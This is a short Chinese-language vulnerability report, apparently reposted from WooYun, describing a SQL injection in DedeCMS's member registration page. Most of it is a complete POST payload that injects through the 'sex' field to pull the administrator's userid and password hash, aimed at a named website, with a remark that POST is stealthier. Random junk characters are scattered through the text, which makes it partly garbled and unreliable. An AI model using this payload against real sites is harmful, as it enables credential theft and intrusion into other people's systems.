漏洞类型: SQL注射漏洞7 h: \6 X+ ~' @" L# z
简要描述:
4 L) p- S0 w8 V1 @2 `3 F
; N$ Q1 w* D" l0 j. N需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞. l! k; |% q7 G
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.; x* R7 H; B! a+ g/ p& i- N
详细说明:跟这个漏洞! V& X/ o* s5 B+ z; f6 ^0 C& p3 `
7 J5 m* |" f+ P% _1 T3 b: [# R# E1 z
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
2 g+ y6 C, B. B' U# o; \ y9 s2 k5 g是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.% @% x) @7 g& d" |+ H+ _9 e
POST提交以下数据,其实不用POST提交的,这样隐蔽点.6 z. I) A3 B5 Y5 H7 r" E7 J1 J
7 N: P9 q5 {( _" I
www.political-security.com/member/reg_new.php3 ]2 p) I) D) n7 T: C# D
' B$ b# ]7 o, d2 Z
POST6 a! ]& `7 F6 [- I
$ |# }! `! t0 B2 D" J& Odopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&4 S* t& g% ^) w4 f' Y1 v0 D+ q! K9 f# k
userid=c4rp3nt3r&uname=c4rp3nt3r5 ?; f# L0 v. H* Y! ] g% ?
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss b. T h* {2 S% s/ f1 U' f
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,0 ^# x( g( i3 Z+ U9 { \6 c
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
4 R8 |. t. j* W- i0 ]; S%00&vdcode=glos&agree= |